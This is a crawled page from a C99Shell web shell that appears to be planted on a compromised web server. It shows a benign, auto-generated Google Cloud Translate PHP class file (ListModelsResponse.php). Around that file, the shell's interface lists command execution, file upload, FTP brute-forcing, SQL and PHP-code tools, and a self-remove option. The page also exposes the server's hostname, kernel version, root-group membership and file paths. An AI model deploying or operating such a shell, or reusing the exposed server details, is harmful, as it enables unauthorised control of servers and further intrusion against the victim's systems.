!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/test.qr.picotech.app/public_html/vendor/google/cloud-translate/src/V3/   drwxr-xr-x
Free 29.24 GB of 117.98 GB (24.78%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ListModelsResponse.php (3.22 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: google/cloud/translate/v3/automl_translation.proto

namespace Google\Cloud\Translate\V3;

use 
Google\Protobuf\Internal\GPBType;
use 
Google\Protobuf\Internal\RepeatedField;
use 
Google\Protobuf\Internal\GPBUtil;

/**
 * Response message for ListModels.
 *
 * Generated from protobuf message <code>google.cloud.translation.v3.ListModelsResponse</code>
 */
class ListModelsResponse extends \Google\Protobuf\Internal\Message
{
    
/**
     * The models read.
     *
     * Generated from protobuf field <code>repeated .google.cloud.translation.v3.Model models = 1;</code>
     */
    
private $models;
    
/**
     * A token to retrieve next page of results.
     * Pass this token to the page_token field in the ListModelsRequest to
     * obtain the corresponding page.
     *
     * Generated from protobuf field <code>string next_page_token = 2;</code>
     */
    
private $next_page_token '';

    
/**
     * Constructor.
     *
     * @param array $data {
     *     Optional. Data for populating the Message object.
     *
     *     @type array<\Google\Cloud\Translate\V3\Model>|\Google\Protobuf\Internal\RepeatedField $models
     *           The models read.
     *     @type string $next_page_token
     *           A token to retrieve next page of results.
     *           Pass this token to the page_token field in the ListModelsRequest to
     *           obtain the corresponding page.
     * }
     */
    
public function __construct($data NULL) {
        
\GPBMetadata\Google\Cloud\Translate\V3\AutomlTranslation::initOnce();
        
parent::__construct($data);
    }

    
/**
     * The models read.
     *
     * Generated from protobuf field <code>repeated .google.cloud.translation.v3.Model models = 1;</code>
     * @return \Google\Protobuf\Internal\RepeatedField
     */
    
public function getModels()
    {
        return 
$this->models;
    }

    
/**
     * The models read.
     *
     * Generated from protobuf field <code>repeated .google.cloud.translation.v3.Model models = 1;</code>
     * @param array<\Google\Cloud\Translate\V3\Model>|\Google\Protobuf\Internal\RepeatedField $var
     * @return $this
     */
    
public function setModels($var)
    {
        
$arr GPBUtil::checkRepeatedField($var\Google\Protobuf\Internal\GPBType::MESSAGE\Google\Cloud\Translate\V3\Model::class);
        
$this->models $arr;

        return 
$this;
    }

    
/**
     * A token to retrieve next page of results.
     * Pass this token to the page_token field in the ListModelsRequest to
     * obtain the corresponding page.
     *
     * Generated from protobuf field <code>string next_page_token = 2;</code>
     * @return string
     */
    
public function getNextPageToken()
    {
        return 
$this->next_page_token;
    }

    
/**
     * A token to retrieve next page of results.
     * Pass this token to the page_token field in the ListModelsRequest to
     * obtain the corresponding page.
     *
     * Generated from protobuf field <code>string next_page_token = 2;</code>
     * @param string $var
     * @return $this
     */
    
public function setNextPageToken($var)
    {
        
GPBUtil::checkString($varTrue);
        
$this->next_page_token $var;

        return 
$this;
    }

}


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--